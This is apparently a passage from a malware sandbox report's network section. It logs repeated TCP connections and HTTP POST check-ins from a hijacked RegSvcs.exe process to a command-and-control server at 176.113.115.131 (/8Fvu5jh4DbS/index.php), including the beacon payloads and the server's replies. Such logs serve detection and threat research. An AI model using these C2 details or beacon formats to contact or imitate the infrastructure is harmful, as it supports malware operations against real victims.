                                                    Jan 8, 2025 08:44:55.651984930 CET5613380192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:44:55.656585932 CET8056132176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:44:55.656636953 CET5613280192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:44:55.656748056 CET8056133176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:44:55.656836033 CET5613380192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:44:55.656970024 CET5613380192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:44:55.661798000 CET8056133176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:44:56.340996981 CET8056133176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:44:56.341052055 CET5613380192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:44:57.859680891 CET5613380192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:44:57.860331059 CET5613480192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:44:57.864651918 CET8056133176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:44:57.864727020 CET5613380192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:44:57.865168095 CET8056134176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:44:57.865228891 CET5613480192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:44:57.865582943 CET5613480192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:44:57.870337009 CET8056134176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:44:58.567358971 CET8056134176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:44:58.568416119 CET5613480192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:00.198592901 CET5613480192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:00.198978901 CET5613580192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:00.203869104 CET8056134176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:00.203886032 CET8056135176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:00.203923941 CET5613480192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:00.203999043 CET5613580192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:00.204128981 CET5613580192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:00.208914995 CET8056135176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:00.904352903 CET8056135176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:00.905004978 CET5613580192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:02.416296005 CET5613580192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:02.416563988 CET5613680192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:02.421403885 CET8056136176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:02.421418905 CET8056135176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:02.421506882 CET5613680192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:02.421534061 CET5613580192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:02.421617031 CET5613680192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:02.426333904 CET8056136176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:03.143517971 CET8056136176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:03.143636942 CET5613680192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:04.776004076 CET5613680192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:04.776005983 CET5613780192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:04.780962944 CET8056137176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:04.781032085 CET8056136176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:04.784404039 CET5613680192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:04.784405947 CET5613780192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:04.784568071 CET5613780192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:04.789303064 CET8056137176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:05.482996941 CET8056137176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:05.483055115 CET5613780192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:06.995410919 CET5613880192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:06.995451927 CET5613780192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:07.000334978 CET8056138176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:07.000432014 CET5613880192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:07.000546932 CET8056137176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:07.000576973 CET5613880192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:07.000602961 CET5613780192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:07.005681038 CET8056138176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:07.716079950 CET8056138176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:07.716156006 CET5613880192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:09.338360071 CET5613880192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:09.338514090 CET5613980192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:09.343444109 CET8056139176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:09.343460083 CET8056138176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:09.346700907 CET5613880192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:09.346715927 CET5613980192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:09.346865892 CET5613980192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:09.351654053 CET8056139176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:10.053905964 CET8056139176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:10.053982973 CET5613980192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:11.557869911 CET5613980192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:11.558233023 CET5614080192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:11.562900066 CET8056139176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:11.562988043 CET5613980192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:11.563128948 CET8056140176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:11.563199043 CET5614080192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:11.563364983 CET5614080192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:11.568159103 CET8056140176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:12.274687052 CET8056140176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:12.274753094 CET5614080192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:13.911859989 CET5614080192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:13.915224075 CET5614180192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:13.916858912 CET8056140176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:13.916917086 CET5614080192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:13.920124054 CET8056141176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:13.920190096 CET5614180192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:13.924757957 CET5614180192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:13.929536104 CET8056141176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:14.620548964 CET8056141176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:14.623132944 CET5614180192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:16.135870934 CET5614180192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:16.136445999 CET5614280192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:16.140866041 CET8056141176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:16.140916109 CET5614180192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:16.141287088 CET8056142176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:16.141345024 CET5614280192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:16.141515970 CET5614280192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:16.146943092 CET8056142176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:16.834738016 CET8056142176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:16.834867001 CET5614280192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:18.464109898 CET5614280192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:18.464509010 CET5614380192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:18.469249010 CET8056142176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:18.469297886 CET5614280192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:18.469356060 CET8056143176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:18.469427109 CET5614380192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:18.469571114 CET5614380192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:18.474298000 CET8056143176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:19.163832903 CET8056143176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:19.166585922 CET5614380192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:20.683135033 CET5614380192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:20.683435917 CET5614480192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:20.688255072 CET8056144176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:20.688370943 CET5614480192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:20.688467979 CET5614480192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:20.688468933 CET8056143176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:20.688782930 CET5614380192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:20.693299055 CET8056144176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:21.393930912 CET8056144176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:21.394059896 CET5614480192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:23.051909924 CET5614480192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:23.052377939 CET5614580192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:23.058892012 CET8056145176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:23.058907032 CET8056144176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:23.059176922 CET5614580192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:23.059185028 CET5614480192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:23.063477039 CET5614580192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:23.069740057 CET8056145176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:23.755655050 CET8056145176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:23.755706072 CET5614580192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:25.260931015 CET5614580192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:25.260957003 CET5614680192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:25.266678095 CET8056146176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:25.266825914 CET8056145176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:25.268481970 CET5614580192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:25.268487930 CET5614680192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:25.270421028 CET5614680192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:25.276154995 CET8056146176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:25.968200922 CET8056146176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:25.968264103 CET5614680192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:27.589001894 CET5614680192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:27.589339972 CET5614780192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:27.594851971 CET8056146176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:27.594867945 CET8056147176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:27.594912052 CET5614680192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:27.594948053 CET5614780192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:27.595093966 CET5614780192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:27.600450993 CET8056147176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:28.306273937 CET8056147176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:28.306334019 CET5614780192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:29.823234081 CET5614780192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:29.823617935 CET5614880192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:29.828263998 CET8056147176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:29.828315020 CET5614780192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:29.828375101 CET8056148176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:29.828449965 CET5614880192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:29.828583002 CET5614880192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:29.833427906 CET8056148176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:30.519975901 CET8056148176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:30.523001909 CET5614880192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:32.157756090 CET5614880192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:32.158155918 CET5614980192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:32.162925005 CET8056148176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:32.162974119 CET8056149176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:32.163007021 CET5614880192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:32.163084984 CET5614980192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:32.163258076 CET5614980192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:32.168062925 CET8056149176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:32.853739977 CET8056149176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:32.853818893 CET5614980192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:34.370927095 CET5614980192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:34.371385098 CET5615080192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:34.376010895 CET8056149176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:34.376068115 CET5614980192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:34.376153946 CET8056150176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:34.376219988 CET5615080192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:34.376355886 CET5615080192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:34.381160021 CET8056150176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:35.080810070 CET8056150176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:35.080921888 CET5615080192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:36.719044924 CET5615080192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:36.724046946 CET8056150176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:36.724317074 CET5615080192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:36.737554073 CET5615180192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:36.742491961 CET8056151176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:36.742695093 CET5615180192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:36.747241020 CET5615180192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:36.752137899 CET8056151176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:37.467457056 CET8056151176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:37.467662096 CET5615180192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:38.979352951 CET5615280192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:38.979353905 CET5615180192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:38.984525919 CET8056152176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:38.984724998 CET8056151176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:38.986534119 CET5615180192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:38.986586094 CET5615280192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:38.986635923 CET5615280192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:38.991852045 CET8056152176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:39.706770897 CET8056152176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:39.706831932 CET5615280192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:41.338344097 CET5615280192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:41.340399981 CET5615380192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:41.343384027 CET8056152176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:41.344497919 CET5615280192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:41.345242023 CET8056153176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:41.348551035 CET5615380192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:41.348551035 CET5615380192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:41.353419065 CET8056153176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:42.036473036 CET8056153176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:42.036535025 CET5615380192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:43.542963028 CET5615380192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:43.543330908 CET5615480192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:43.548032999 CET8056153176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:43.548079014 CET5615380192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:43.548136950 CET8056154176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:43.548199892 CET5615480192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:43.548326015 CET5615480192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:43.553054094 CET8056154176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:44.265183926 CET8056154176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:44.265260935 CET5615480192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:45.901335001 CET5615480192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:45.901662111 CET5615580192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:45.907402039 CET8056154176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:45.907414913 CET8056155176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:45.907465935 CET5615480192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:45.907505989 CET5615580192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:45.907608032 CET5615580192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:45.912374020 CET8056155176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:46.605041981 CET8056155176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:46.606502056 CET5615580192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:48.119791031 CET5615580192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:48.120057106 CET5615680192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:48.124875069 CET8056156176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:48.124938011 CET5615680192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:48.124970913 CET8056155176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:48.125010014 CET5615580192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:48.125080109 CET5615680192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:48.129782915 CET8056156176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:48.840301991 CET8056156176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:48.840370893 CET5615680192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:50.464004040 CET5615680192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:50.464528084 CET5615780192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:50.469038010 CET8056156176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:50.469093084 CET5615680192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:50.469398022 CET8056157176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:50.469461918 CET5615780192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:50.469605923 CET5615780192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:50.474451065 CET8056157176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:51.176527977 CET8056157176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:51.180517912 CET5615780192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:52.697676897 CET5615780192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:52.698421955 CET5615880192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:52.703299046 CET8056158176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:52.703399897 CET5615880192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:52.703536987 CET5615880192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:52.707063913 CET8056157176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:52.708370924 CET8056158176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:52.708477020 CET5615780192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:53.412576914 CET8056158176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:53.412687063 CET5615880192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:55.047502995 CET5615880192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:55.047954082 CET5615980192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:55.052614927 CET8056158176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:55.052753925 CET8056159176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:55.052794933 CET5615880192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:55.054538965 CET5615980192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:55.055404902 CET5615980192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:55.060220957 CET8056159176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:55.740772963 CET8056159176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:55.740838051 CET5615980192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:57.245979071 CET5615980192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:57.248430014 CET5616080192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:57.251009941 CET8056159176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:57.251167059 CET5615980192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:57.253315926 CET8056160176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:57.256526947 CET5616080192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:57.256735086 CET5616080192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:57.261533976 CET8056160176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:57.976516962 CET8056160176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:57.976588964 CET5616080192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:59.604540110 CET5616080192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:59.604768991 CET5616180192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:59.609703064 CET8056161176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:59.609725952 CET8056160176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:45:59.609764099 CET5616180192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:59.609797955 CET5616080192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:59.609930038 CET5616180192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:45:59.614876032 CET8056161176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:46:00.308507919 CET8056161176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:46:00.308569908 CET5616180192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:46:01.822839975 CET5616180192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:46:01.823395014 CET5616280192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:46:01.827853918 CET8056161176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:46:01.827900887 CET5616180192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:46:01.828178883 CET8056162176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:46:01.828269005 CET5616280192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:46:01.828758955 CET5616280192.168.2.4176.113.115.131
                                                    Jan 8, 2025 08:46:01.833525896 CET8056162176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:46:02.527359962 CET8056162176.113.115.131192.168.2.4
                                                    Jan 8, 2025 08:46:02.527470112 CET5616280192.168.2.4176.113.115.131

                                                    UDP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Jan 8, 2025 08:42:41.233341932 CET5355514162.159.36.2192.168.2.4
                                                    Jan 8, 2025 08:42:41.700047016 CET53571101.1.1.1192.168.2.4

                                                    HTTP Request Dependency Graph

                                                    • 176.113.115.131

                                                    HTTP Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.449733176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:42:02.113203049 CET160OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 4
                                                    Cache-Control: no-cache
                                                    Data Raw: 73 74 3d 73
                                                    Data Ascii: st=s
                                                    Jan 8, 2025 08:42:02.811652899 CET197INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:42:02 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 8 <c>3<d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    1192.168.2.449737176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:42:04.327261925 CET312OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 154
                                                    Cache-Control: no-cache
                                                    Data Raw: 72 3d 35 37 32 35 45 30 37 41 38 35 46 38 37 43 36 41 46 34 33 35 35 45 34 43 35 41 42 34 36 41 41 34 35 34 33 38 35 36 33 34 30 42 32 46 38 41 30 30 44 39 31 36 42 33 35 38 43 41 30 45 33 33 45 35 37 32 35 38 46 42 32 41 34 34 43 34 30 39 44 39 31 44 35 41 37 33 46 31 42 37 38 44 36 38 36 32 43 42 34 32 41 46 36 34 42 43 34 30 39 32 34 42 36 35 31 36 30 45 45 42 36 44 43 44 44 46 32 35 38 30 37 33 41 31 38 38 31 45 36 32 38 34 39 42 42 42 31 37 36 39 35 42
                                                    Data Ascii: r=5725E07A85F87C6AF4355E4C5AB46AA4543856340B2F8A00D916B358CA0E33E57258FB2A44C409D91D5A73F1B78D6862CB42AF64BC40924B65160EEB6DCDDF258073A1881E62849BBB17695B
                                                    Jan 8, 2025 08:42:05.045120955 CET196INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Wed, 08 Jan 2025 07:42:04 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 7 <c><d>0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    2192.168.2.449738176.113.115.131801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jan 8, 2025 08:42:06.683646917 CET160OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Host: 176.113.115.131
                                                    Content-Length: 4
                                                    Cache-Control: no-cache
